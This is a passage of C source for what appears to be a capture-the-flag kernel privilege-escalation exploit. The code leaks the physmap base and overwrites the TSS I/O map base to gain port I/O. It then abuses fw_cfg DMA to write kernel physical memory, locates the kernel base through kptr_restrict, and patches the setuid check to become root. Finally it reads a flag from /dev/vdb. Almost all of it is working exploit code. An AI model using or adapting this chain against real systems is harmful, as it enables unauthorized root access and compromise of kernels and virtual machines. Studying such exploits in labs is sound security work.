 *             (terminating NUL included).
 * size      - number of bytes.
 *
 * Two commands are issued: the first selects item FW_CFG_SIGNATURE and skips
 * to the offset at which `value` was found, the second reads `size` bytes to
 * phys_addr.
 *
 * Returns 0 in all cases, including when `value` is not found in SIGNATURE
 * (nothing is written then).
 *
 * The search and the offset computation use one named array, so the result
 * does not depend on the compiler merging two identical string literals.
 */
int phys_arb_w(uint64_t phys_addr, char* value, int size){
    static const char signature[] = SIGNATURE;

    const char *hit = memmem(signature, sizeof(signature), value, size);
    if (hit == NULL)
        return 0;

    uint32_t byte_off = (uint32_t)(hit - signature);

    fw_cfg_dma_submit(sp0_get_cmd(fw_ctl_skip | fw_ctl_select | (FW_CFG_SIGNATURE << 16), 0, byte_off));
    fw_cfg_dma_submit(sp0_get_cmd(fw_ctl_read | (FW_CFG_SIGNATURE << 16), phys_addr, size));

    return 0;
}

/*
 * Read the integer currently exposed by the KPTR_RESTRICT file.
 *
 * Returns the parsed value, or 0 when the file cannot be opened or does not
 * start with a number. Opening failures are reported with perror(); NULL is
 * never passed to fscanf(), and the conversion specifier matches the
 * destination type.
 */
uint32_t check_kptr_restrict(){
    unsigned int value = 0;

    FILE *f = fopen(KPTR_RESTRICT, "rb");
    if (f == NULL) {
        perror(KPTR_RESTRICT);
        return 0;
    }

    if (fscanf(f, "%u", &value) != 1)
        value = 0;
    fclose(f);

    return value;
}

/*
 * Locate the kernel's physical base, patch SETUID_CHECK and dump /dev/vdb.
 *
 *  1. Install sigfpe_handler() (needed by sp0_get_cmd()).
 *  2. Scan candidate bases from CONFIG_PHYSICAL_START +
 *     0x100 * CONFIG_PHYSICAL_ALIGN downwards in CONFIG_PHYSICAL_ALIGN steps.
 *     For each candidate, write SIGNATURE at candidate + KPTR_RESTRICT_OFFSET
 *     and stop when check_kptr_restrict() reads back non-zero.
 *  3. Overwrite 7 bytes at base + SETUID_CHECK with 'E','M','E','M','E','M','E',
 *     call setuid(0), then print up to 255 bytes read from /dev/vdb.
 *  4. Spin forever.
 *
 * The scan stops after CONFIG_PHYSICAL_START has been tried. The loop
 * variable is unsigned and the lower bound is 0, so a `>=` test can never
 * fail and the address would wrap around instead. If no candidate matches,
 * an error is printed and the function returns without patching anything.
 */
void fw_cfg() {
    struct sigaction sa_fpe = {0};
    sa_fpe.sa_sigaction = sigfpe_handler;
    sa_fpe.sa_flags = SA_SIGINFO;
    sigaction(SIGFPE, &sa_fpe, NULL);

    uint64_t phys_kbase = CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN * 0x100;
    int found = 0;
    for (;;) {
        phys_arb_w(phys_kbase + KPTR_RESTRICT_OFFSET, SIGNATURE, sizeof(SIGNATURE));
        if (check_kptr_restrict() != 0) {
            found = 1;
            break;
        }
        /* Stop before stepping below the lower bound (and wrapping). */
        if (phys_kbase < CONFIG_PHYSICAL_START + CONFIG_PHYSICAL_ALIGN)
            break;
        phys_kbase -= CONFIG_PHYSICAL_ALIGN;
    }
    if (!found) {
        fprintf(stderr, "phys kbase not found\n");
        return;
    }
    printf("phys kbase @ %lx\n", phys_kbase);

    phys_arb_w(phys_kbase + SETUID_CHECK+0, "E", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+1, "M", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+2, "E", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+3, "M", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+4, "E", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+5, "M", 1);
    phys_arb_w(phys_kbase + SETUID_CHECK+6, "E", 1);

    setuid(0);

    char flag[0x100];
    int fd = open("/dev/vdb", O_RDONLY);
    if (fd < 0) {
        perror("/dev/vdb");
    } else {
        /* Leave room for, and add, the terminator puts() relies on. */
        ssize_t got = read(fd, flag, sizeof(flag) - 1);
        if (got < 0) {
            perror("read");
            got = 0;
        }
        flag[got] = '\0';
        puts(flag);
        close(fd);
    }

    while(1) {};
}

// EXPLOIT
/*
 * Entry point of the single-core variant: run the watchpoint step, leak the
 * physmap base, write 0x3000 at (physmap + TSS_PHYS + 0x66) via arb_w(), and
 * hand over to fw_cfg().
 * NOTE(review): 0x66 is presumably the offset of the I/O map base field in
 * the 64-bit TSS -- confirm.
 */
int main() {
    trigger_debug();

    const uint64_t physmap = physmap_leak();
    printf("physmap @ %lx\n", physmap);

    const uint64_t tss = physmap + TSS_PHYS;
    const uint64_t iomap_base = tss + 0x66;
    arb_w(iomap_base);

    fw_cfg();

    return 0;
}
```
